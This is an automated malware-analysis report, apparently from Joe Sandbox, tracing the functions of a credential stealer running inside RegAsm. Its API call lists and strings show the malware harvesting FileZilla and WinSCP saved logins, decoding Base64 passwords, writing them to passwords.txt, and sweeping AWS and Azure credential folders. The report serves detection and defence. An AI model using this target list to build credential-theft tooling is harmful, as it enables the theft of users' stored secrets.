Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E

Part of subcall function 00411A16: LocalAlloc.KERNEL32(00000040,?,000000C8,00000001,?,00413DEE,00000000,00000000), ref: 00411A2F

strtok_s.MSVCRT ref: 0040C80D
GetProcessHeap.KERNEL32(00000000,000F423F,00426D1F,00426D1E,00426D1B,00426D1A), ref: 0040C861
HeapAlloc.KERNEL32(00000000), ref: 0040C868
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040C87C
lstrlenA.KERNEL32(00000000), ref: 0040C887
StrStrA.SHLWAPI(00000000,<Port>), ref: 0040C8BF
lstrlenA.KERNEL32(00000000), ref: 0040C8CA
StrStrA.SHLWAPI(00000000,<User>), ref: 0040C908
lstrlenA.KERNEL32(00000000), ref: 0040C913
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040C951
lstrlenA.KERNEL32(00000000), ref: 0040C960
lstrlenA.KERNEL32(?), ref: 0040CB5B

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415718: _EH_prolog.MSVCRT ref: 0041571D
Part of subcall function 00415718: CreateThread.KERNEL32(00000000,00000000,00413F49,?,00000000,00000000), ref: 004157C3
Part of subcall function 00415718: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004157CB

memset.MSVCRT ref: 0040CBAE

Strings

Soft: FileZilla, xrefs: 0040CA43
<Pass encoding="base64">, xrefs: 0040C94B
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040C79C
<User>, xrefs: 0040C902
Login: , xrefs: 0040CA9F
<Host>, xrefs: 0040C876
<Port>, xrefs: 0040C8B9
Password: , xrefs: 0040CACD
passwords.txt, xrefs: 0040CB6D
Host: , xrefs: 0040CA51

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitmemsetstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 486015307-935134978
Opcode ID: afc6c71b7570d8faaf45d3391370895ef611cb6793d92e31a28e4d96854fdc01
Instruction ID: 4ab4889d275ddae6668f51a76bdbaf2592b381e176f3efab1b73e712284724ec
Opcode Fuzzy Hash: afc6c71b7570d8faaf45d3391370895ef611cb6793d92e31a28e4d96854fdc01
Instruction Fuzzy Hash: C3E19271940258EADB01FBE1DC46EEEBB78AF15308F50005EF515B2192EF781AD8CB69

Function 0040F2FC Relevance: 63.4, APIs: 22, Strings: 14, Instructions: 411registryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040F301
memset.MSVCRT ref: 0040F32A
memset.MSVCRT ref: 0040F34A
memset.MSVCRT ref: 0040F35E
memset.MSVCRT ref: 0040F372
memset.MSVCRT ref: 0040F381
memset.MSVCRT ref: 0040F38F
memset.MSVCRT ref: 0040F3A0
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040F3C8
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040F3F0
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040F437
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040F454
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,00426D13), ref: 0040F4E6
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0040F538

Strings

UserName, xrefs: 0040F5F5
Security, xrefs: 0040F3E8
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040F3B5
:22, xrefs: 0040F587
Login: , xrefs: 0040F5B7
HostName, xrefs: 0040F4D7
PortNumber, xrefs: 0040F522
Host: , xrefs: 0040F499
Soft: WinSCP, xrefs: 0040F46F
Password: , xrefs: 0040F687
passwords.txt, xrefs: 0040F7CC
UseMasterPassword, xrefs: 0040F3E3
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040F42D
Password, xrefs: 0040F676

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memset$Value$Open$EnumH_prolog
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 784052110-2798830873
Opcode ID: ab34ac09f32850ba6f0529d8247eb29debc239e0ba7d1267876fd31cf4e00439
Instruction ID: 634755f2be366f2ad39b70593c1f2f6124fcbf9be8eb65c2b945daf7fee5a81a
Opcode Fuzzy Hash: ab34ac09f32850ba6f0529d8247eb29debc239e0ba7d1267876fd31cf4e00439
Instruction Fuzzy Hash: F7F11EB1C0025DEEDB11EB90DC85FEEB77CAF14308F1441ABE515B2182EB785A89CB65

Function 00408F1C Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 258stringmemoryfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00408F21

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00409021
GetFileSize.KERNEL32(00000000,00000000), ref: 00409029
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00409035
??_U@YAPAXI@Z.MSVCRT ref: 0040903F
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00409050
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040905C
HeapAlloc.KERNEL32(00000000), ref: 00409063
StrStrA.SHLWAPI(?), ref: 00409075
StrStrA.SHLWAPI(-00000010), ref: 0040908F
lstrcat.KERNEL32(00000000), ref: 004090A3
lstrcat.KERNEL32(00000000,00000000), ref: 004090B5
lstrcat.KERNEL32(00000000,00426E28), ref: 004090C3
lstrcat.KERNEL32(00000000,00000000), ref: 004090D5
lstrcat.KERNEL32(00000000,00426E2C), ref: 004090E3
lstrcat.KERNEL32(00000000), ref: 004090F2
lstrcat.KERNEL32(00000000,-00000010), ref: 004090FC
lstrcat.KERNEL32(00000000,00426E30), ref: 0040910A
StrStrA.SHLWAPI(-000000FE), ref: 0040911A
StrStrA.SHLWAPI(00000014), ref: 0040912A
lstrcat.KERNEL32(00000000), ref: 0040913E

Part of subcall function 00408E1E: memset.MSVCRT ref: 00408E45
Part of subcall function 00408E1E: lstrlenA.KERNEL32(0040914A,00000001,?,00000014,00000000,00000000,?,0040914A,00000014), ref: 00408E5F
Part of subcall function 00408E1E: CryptStringToBinaryA.CRYPT32(0040914A,00000000,?,0040914A,00000014), ref: 00408E69
Part of subcall function 00408E1E: memcpy.MSVCRT ref: 00408ED1

lstrcat.KERNEL32(00000000,00000000), ref: 0040914F
lstrcat.KERNEL32(00000000,00426E34), ref: 0040915D
StrStrA.SHLWAPI(-000000FE), ref: 0040916D
StrStrA.SHLWAPI(00000014), ref: 0040917D
lstrcat.KERNEL32(00000000), ref: 00409191

Part of subcall function 00408E1E: lstrcat.KERNEL32(00426C63,00426C67), ref: 00408EF8
Part of subcall function 00408E1E: lstrcat.KERNEL32(00426C63,00426C6A), ref: 00408F10

lstrcat.KERNEL32(00000000,00000000), ref: 004091A2
lstrcat.KERNEL32(00000000,00426E38), ref: 004091B0
lstrcat.KERNEL32(00000000,00426E3C), ref: 004091BE
StrStrA.SHLWAPI(-000000FE), ref: 004091CE
lstrlenA.KERNEL32(00000000), ref: 004091E4
memset.MSVCRT ref: 00409237
CloseHandle.KERNEL32(00000000), ref: 00409240

Strings

passwords.txt, xrefs: 004091F6

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Filelstrcpy$H_prologlstrlen$HeapPointermemset$AllocBinaryCloseCryptHandleProcessReadSizeStringmemcpy
String ID: passwords.txt
API String ID: 2199717062-347816968
Opcode ID: 1c493158815b345529b71cbbe7bdac8000124dad8378272bb97ba3b52fb1998e
Instruction ID: 104977c28224fce7358f0056011e48d859784dec5f8cfdcd40789d74d97336bd
Opcode Fuzzy Hash: 1c493158815b345529b71cbbe7bdac8000124dad8378272bb97ba3b52fb1998e
Instruction Fuzzy Hash: 2AA19275800159EFDB11ABE0DD49EEE7F7AFF0A304F10101AF611A31A1DB750A99CBA5

Function 0041869A Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 154libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,004185CC), ref: 0041869F
GetProcAddress.KERNEL32 ref: 004186E4
GetProcAddress.KERNEL32 ref: 004186FB
GetProcAddress.KERNEL32 ref: 00418712
GetProcAddress.KERNEL32 ref: 00418729
GetProcAddress.KERNEL32 ref: 00418740
GetProcAddress.KERNEL32 ref: 00418757
GetProcAddress.KERNEL32 ref: 0041876E
GetProcAddress.KERNEL32 ref: 00418785
GetProcAddress.KERNEL32 ref: 0041879C
GetProcAddress.KERNEL32 ref: 004187B3
GetProcAddress.KERNEL32 ref: 004187CA
GetProcAddress.KERNEL32 ref: 004187E1
GetProcAddress.KERNEL32 ref: 004187F8
GetProcAddress.KERNEL32 ref: 0041880F
GetProcAddress.KERNEL32 ref: 00418826
GetProcAddress.KERNEL32 ref: 0041883D
GetProcAddress.KERNEL32 ref: 00418854
GetProcAddress.KERNEL32 ref: 0041886B
GetProcAddress.KERNEL32 ref: 00418882
GetProcAddress.KERNEL32 ref: 00418899
LoadLibraryA.KERNEL32 ref: 004188AA
LoadLibraryA.KERNEL32 ref: 004188BB
LoadLibraryA.KERNEL32 ref: 004188CC
LoadLibraryA.KERNEL32 ref: 004188DD
LoadLibraryA.KERNEL32 ref: 004188EE
GetProcAddress.KERNEL32(75A70000), ref: 00418909
GetProcAddress.KERNEL32(75290000), ref: 00418924
GetProcAddress.KERNEL32 ref: 0041893B
GetProcAddress.KERNEL32(75BD0000), ref: 00418956
GetProcAddress.KERNEL32(75450000), ref: 00418971
GetProcAddress.KERNEL32(76E90000), ref: 0041898C
GetProcAddress.KERNEL32 ref: 004189A3

Strings

kernel32.dll, xrefs: 0041869A

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: kernel32.dll
API String ID: 2238633743-1793498882
Opcode ID: e65828b0c66dc26061e2c0e7d9b1796d2740442de5efe0fdb42efe12d386c785
Instruction ID: 5f6b59c35ab2e6ee9b090b16220d4806d9577dfe2d4b5e763f0da95d42eb1007
Opcode Fuzzy Hash: e65828b0c66dc26061e2c0e7d9b1796d2740442de5efe0fdb42efe12d386c785
Instruction Fuzzy Hash: DB710D7D480241EFEBA16FA0FD589653BB7F70B7413106126EA058A630DB3249E9EF51

Function 1B4B5660 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 452COMMON

Download Yara Rule

Strings

Auxiliary rtree columns must be last, xrefs: 1B4B56B3, 1B4B58B3
_node, xrefs: 1B4B579E
,%.*s, xrefs: 1B4B5804, 1B4B5835
CREATE TABLE x(%.*s INT, xrefs: 1B4B57CA

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: ,%.*s$Auxiliary rtree columns must be last$CREATE TABLE x(%.*s INT$_node
API String ID: 0-209218429
Opcode ID: d7dbe912db00cc590f2dc345f24a5fc74fa972da5529f4ed39fbdc7b0b74b39f
Instruction ID: 81486c8783d846e18cbef966b2b71b914c676368a44bdc287a1d40cbde962748
Opcode Fuzzy Hash: d7dbe912db00cc590f2dc345f24a5fc74fa972da5529f4ed39fbdc7b0b74b39f
Instruction Fuzzy Hash: 02F1E1B59043019FDB009F24C991BDAF7E8BF94305F84452DFA8A97201D736E969CBB2

Function 1B479120 Relevance: 45.9, APIs: 23, Strings: 3, Instructions: 355COMMON

Download Yara Rule

Strings

,%s, xrefs: 1B479297
_node, xrefs: 1B479202
CREATE TABLE x(_shape, xrefs: 1B479268

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: ,%s$CREATE TABLE x(_shape$_node
API String ID: 0-1242591684
Opcode ID: 412e2e883ea69e09a452abf317dd745fde367f538af1fa20957fcc236b3faf24
Instruction ID: aceedff56ac52026bf0636045aa38fb0ef718ec03c5755408bce9ce8bff75349
Opcode Fuzzy Hash: 412e2e883ea69e09a452abf317dd745fde367f538af1fa20957fcc236b3faf24
Instruction Fuzzy Hash: E8C1E5BA500301ABDB00AF24CCC9BD777B9FF94305F44852DE98986351D736E969CBA1

Function 1B52B050 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 251COMMON

Download Yara Rule

Strings

%c%u, xrefs: 1B52B2C3
vtab:%p, xrefs: 1B52B283
%s(%d), xrefs: 1B52B1B3
,%s%s%s, xrefs: 1B52B137
program, xrefs: 1B52B2FB
NULL, xrefs: 1B52B267, 1B52B324, 1B52B325
%.18s-%s, xrefs: 1B52B192
%lld, xrefs: 1B52B1DA, 1B52B24C
BINARY, xrefs: 1B52B0D3
(blob), xrefs: 1B52B26C
k(%d, xrefs: 1B52B0A5
%.16g, xrefs: 1B52B217

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %.16g$%.18s-%s$%c%u$%lld$%s(%d)$(blob)$,%s%s%s$BINARY$NULL$k(%d$program$vtab:%p
API String ID: 0-900822179
Opcode ID: b9a87b07e439cd77402c38c3ea5c6d8227c72ebad7efa95db53125fd8d42419c
Instruction ID: 6c0f359061db8da9882d00a69df8cefcd20dae326a5d28f7c1bef37d099782b9
Opcode Fuzzy Hash: b9a87b07e439cd77402c38c3ea5c6d8227c72ebad7efa95db53125fd8d42419c
Instruction Fuzzy Hash: D691E471908305DBFB05DF14C880BEBB7E6AF95304F8449C9E985CB292D732E85687B2

Function 1B3ED820 Relevance: 35.2, APIs: 8, Strings: 12, Instructions: 223COMMON

Download Yara Rule

Strings

porter, xrefs: 1B3ED8EE
matchinfo, xrefs: 1B3ED970, 1B3ED98A
snippet, xrefs: 1B3ED93C
simple, xrefs: 1B3ED8A9
fts3, xrefs: 1B3ED9CA
fts4, xrefs: 1B3ED9F0
fts3_tokenizer, xrefs: 1B3ED921
fts3tokenize, xrefs: 1B3EDA27
offsets, xrefs: 1B3ED956
unicode61, xrefs: 1B3ED90B
fts4aux, xrefs: 1B3ED840
optimize, xrefs: 1B3ED9A4

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 0-449611708
Opcode ID: 8a97da2cba415ce4d362da6201341561ef97fab9c0856a933a9d58575b9ba5cb
Instruction ID: 7fc9cb56525f0db395cdc4eff2112a4dd98b303330ce6a7c5d0bd9d8282ddf10
Opcode Fuzzy Hash: 8a97da2cba415ce4d362da6201341561ef97fab9c0856a933a9d58575b9ba5cb
Instruction Fuzzy Hash: 14516DB5E0432567F7105F689CC9FD7729CAF4461AF08023DFD44A6241E768FA3982B2

Function 00417A73 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 135stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00417A78
memset.MSVCRT ref: 00417A98

Part of subcall function 004119CA: SHGetFolderPathA.SHELL32(00000000,00426D17,00000000,00000000,?), ref: 004119FB

lstrcat.KERNEL32(?,00000000), ref: 00417ABE
lstrcat.KERNEL32(?,\.azure\), ref: 00417ADB

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00417591: _EH_prolog.MSVCRT ref: 00417596
Part of subcall function 00417591: wsprintfA.USER32 ref: 004175B6
Part of subcall function 00417591: FindFirstFileA.KERNEL32(?,?), ref: 004175CD
Part of subcall function 00417591: StrCmpCA.SHLWAPI(?,004279DC), ref: 004175EA
Part of subcall function 00417591: StrCmpCA.SHLWAPI(?,004279E0), ref: 00417604
Part of subcall function 00417591: wsprintfA.USER32 ref: 00417628
Part of subcall function 00417591: StrCmpCA.SHLWAPI(?,004276E2), ref: 00417639
Part of subcall function 00417591: wsprintfA.USER32 ref: 00417656
Part of subcall function 00417591: PathMatchSpecA.SHLWAPI(?,?), ref: 0041767D
Part of subcall function 00417591: lstrcat.KERNEL32(?,?), ref: 004176A9
Part of subcall function 00417591: lstrcat.KERNEL32(?,004279F8), ref: 004176BB
Part of subcall function 00417591: lstrcat.KERNEL32(?,?), ref: 004176CB
Part of subcall function 00417591: lstrcat.KERNEL32(?,004279FC), ref: 004176DD
Part of subcall function 00417591: lstrcat.KERNEL32(?,?), ref: 004176F1

memset.MSVCRT ref: 00417B16
lstrcat.KERNEL32(?,00000000), ref: 00417B41
lstrcat.KERNEL32(?,\.aws\), ref: 00417B5E

Part of subcall function 00417591: wsprintfA.USER32 ref: 0041766A

memset.MSVCRT ref: 00417B99
lstrcat.KERNEL32(?,00000000), ref: 00417BC4
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00417BE1

Part of subcall function 00417591: FindNextFileA.KERNEL32(00000000,?), ref: 0041788C
Part of subcall function 00417591: FindClose.KERNEL32(00000000), ref: 0041789B

memset.MSVCRT ref: 00417C1C

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

\.azure\, xrefs: 00417ACF
\.aws\, xrefs: 00417B52
Azure\.aws, xrefs: 00417B64
*.*, xrefs: 00417B69
Azure\.IdentityService, xrefs: 00417BE7
*.*, xrefs: 00417AE6
msal.cache, xrefs: 00417BEC
\.IdentityService\, xrefs: 00417BD5
Azure\.azure, xrefs: 00417AE1

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

